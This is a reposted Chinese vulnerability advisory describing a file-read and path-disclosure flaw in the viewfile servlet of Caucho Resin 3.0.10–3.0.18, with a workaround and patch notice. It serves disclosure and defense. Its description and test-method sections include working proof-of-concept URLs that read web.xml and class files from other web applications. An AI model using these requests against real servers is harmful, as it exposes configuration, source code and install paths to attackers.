分享

Caucho Resin viewfile远程文件及路径泄露漏洞

 pestd 2006-09-01
转自:绿盟科技
原文地址:http://www./index.php?act=sec_bug&do=view&bug_id=8828

发布日期:2006-05-16
更新日期:2006-05-17

受影响系统:
Caucho Technology Resin v3.0.18
Caucho Technology Resin v3.0.17
Caucho Technology Resin v3.0.16
Caucho Technology Resin v3.0.15
Caucho Technology Resin v3.0.14
Caucho Technology Resin v3.0.13
Caucho Technology Resin v3.0.12
Caucho Technology Resin v3.0.11
Caucho Technology Resin v3.0.10
不受影响系统:
Caucho Technology Resin v3.0.19
描述:
BUGTRAQ  ID: 18007

Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windows操作系统下。

Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。

默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:

http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight

viewfile servlet可以无需参数在Web主目录中浏览任意文件:

http://targetsystem/resin-doc/viewfile/?file=index.jsp

攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:

http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml

如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:

http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class

请求中错误的路径还会泄漏安装的绝对路径:

File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class

<*来源:Joseph Pierini (joep@scanalert.com
  
  链接:http://marc./?l=bugtraq&m=114780293620632&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www./resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
http://www./resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class

建议:
临时解决方法:

* 从生产系统中删除resin-doc.war文件,不要使用默认的配置文件部署。

厂商补丁:

Caucho Technology
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www./download/

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多